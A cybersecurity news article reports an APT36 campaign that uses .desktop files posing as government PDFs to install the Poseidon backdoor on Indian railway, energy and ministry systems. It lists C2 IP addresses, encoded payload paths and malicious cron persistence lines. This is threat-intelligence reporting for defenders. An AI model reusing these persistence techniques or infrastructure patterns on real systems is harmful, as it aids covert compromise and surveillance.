APT36 Hackers Weaponizing PDF Files to Attack Indian Railways, Oil & Government Systems

The Pakistan-linked Advanced Persistent Threat (APT) group APT36, also known as Transparent Tribe, has significantly expanded its cyber operations beyond traditional military targets to encompass critical Indian infrastructure including railway systems, oil and gas facilities, and key government ministries.

This escalation represents a concerning shift in the threat landscape, as the group demonstrates increasingly sophisticated attack methodologies designed to penetrate and persist within India’s most sensitive operational networks.

The threat actors have refined their attack arsenal by weaponizing seemingly innocuous PDF documents through a deceptive technique involving malicious .desktop files.

These files masquerade as legitimate PDF documents but contain embedded scripts that execute in the background while displaying decoy content to unsuspecting victims.

The campaign specifically targets high-value entities including the Ministry of External Affairs, Indian Railways infrastructure, and energy sector organizations, indicating a strategic focus on disrupting critical national services.

Hunt.io researchers identified this campaign in July 2025, discovering over 100 phishing domains designed to impersonate Indian government organizations.

The researchers uncovered two distinct attack variants, each employing separate command and control infrastructure to maintain operational security and provide redundancy against defensive countermeasures.

The sophistication of this infrastructure suggests a well-resourced operation with long-term strategic objectives.

The attack methodology centers on the deployment of the Poseidon backdoor, a sophisticated malware built on the open-source Mythic command and control framework using the Go programming language.

This backdoor provides the attackers with comprehensive system access, enabling credential harvesting, lateral movement capabilities, and persistent surveillance of compromised networks.

The modular design allows operators to dynamically load additional functionality based on specific mission requirements.

Infection Mechanism and Technical Implementation

The infection chain begins when victims receive .desktop files disguised as official government documents, such as “National Anubhav Scheme-2025.pdf.”

Upon execution, these files deploy sophisticated evasion techniques including extended sleep timers and environment detection to bypass dynamic analysis systems.

The malware establishes persistence through automated cron job scheduling, ensuring continuous operation even after system reboots.

The technical implementation reveals two primary attack variants. The first variant utilizes a single command and control server at 209.38.203.53, employing base64-encoded URL paths to obfuscate payload locations:-

# Base64 decoded C2 paths used by APT36
/dG9nb2pvbW8=/p7zip-full  # Decoded: /togojomo/p7zip-full
/eXVndW5kdQ==/tcl-8.7     # Decoded: /yugandu/tcl-8.7

# Persistence mechanism using cron jobs
*/5 * * * * /dev/shm/emacs-bin &
*/10 * * * * ~/.local/share/crond-98 &

The second variant demonstrates enhanced resilience through redundant infrastructure, operating dual command and control servers at 165.232.114.63 and 165.22.251.224.

Malicious payloads are strategically placed in system directories using names like “emacs-bin” and “crond-98” to blend with legitimate system processes, significantly complicating detection efforts.

This illustrates the first attack variant’s execution flow, while the second one shows the redundant infrastructure approach of the second variant.

The Poseidon backdoor communicates with dedicated C2 servers at 178.128.204.138 and 64.227.189.57, both hosted on DigitalOcean infrastructure, utilizing port 7443 for secure command transmission.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches